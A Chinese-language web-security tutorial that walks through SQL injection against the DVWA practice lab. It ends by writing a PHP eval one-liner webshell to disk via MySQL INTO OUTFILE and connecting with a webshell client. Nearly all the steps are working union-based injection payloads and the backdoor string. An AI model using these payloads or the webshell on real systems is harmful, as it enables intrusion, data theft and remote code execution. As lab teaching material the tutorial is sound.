一步一步学习 Web 安全 2.9 MySQL 获取 websh

实战中情况会复杂很多，这里只做简单的演示和说明以便理解。

原理

mysql 获取 webshell 是利用 MySQL 读写文件的函数将一句话木马存至数据库中，再将这个字段导出为PHP文件至服务器目录下，通过菜刀连接。至于数据库的信息和权限需要分别通过爆库和提权来实现。

这里是利用 MySQL 读写文件的函数将一句话木马写入指定目录下，然后通过菜刀连接。至于数据库的信息和权限需要分别通过爆库和提权来实现。

前提

在执行前需要确认：

1. 用户具有 root 权限
2. 网站目录(获取方法：报错、phpinfo页面、猜、爆破等)
3. GPC 是否关闭（是否对单引号进行转义）,如果是打开的，我们输入的单引号『'』在代码运行时都会被加上反斜杠『'』
4. secure_file_priv 为打开的状态
   • 首先要确认 MySQL 版本，5.5.53 前没有这个值默认可以使用，5.5 后默认为 null，secure_file_priv 的三种状态：
     ①. secure_file_priv 为 null 表示不允许导入导出文件
     ②. secure_file_priv 指定文件夹时，表示 mysql 的导入导出只能发生在指定的文件夹
     ③. secure_file_priv 没有设置时，比如：secure_file_priv=''，则表示没有任何限制
   • 查看 secure_file_priv 的值：
     show global variables like '%secure%';
   • 手动修改（当然，在实战中需要数据库已经开启secure_file_priv），在 mysql.ini 文件添加：
     secure_file_priv = ''
     然后重启数据库

练习

打开 dvwa，low 级别，SQL injection 页面。如果还未安装，可以参考 dvwa 的安装。

1. 注入判断
   输入：1，返回了 first name 和 surname
   输入：'，报错
   说明这里为注入点
2. 查看对应数据
   输入：' or '' = '，返回了所有的 first name 和 surname，同时可以猜测字段数为 2
3. 获取列数判断显位
   输入：1' order by 3 #，报错
   输入：1' order by 2 #，返回数据，可见字段数的确为 2
   输入：1' union select 1,2 #，1 和 2 按顺序输出了
4. 获取库名和版本
   输入：-1' union select database(), version() #
5. 用户名
   输入：-1' union select 1,user() #
6. 所有数据库
   输入：-1' union select 1,schema_name from information_schema.schemata #
7. 当前数据库的所有表
   输入：-1' union select 1,table_name from information_schema.tables where table_schema=database() #
8. users 表的所有字段
   输入：-1' union select 1,column_name from information_schema.columns where table_name = 'users' #
9. 数据库路径
   输入：-1' union select 1,@@datadir#，返回了当前数据库的目录路径：C:\phpstudy\phpstudy_pro\Extensions\MySQL5.7.26\data
10. 往这个目录写入一句话木马
    输入：-1' into outfile 'C:\\phpstudy\\phpstudy_pro\\Extensions\\MySQL5.7.26\\data\\muma.php' lines starting by '<?php @eval($_POST[pass])?>' #
11. 写入后使用菜刀连接，获取 webshell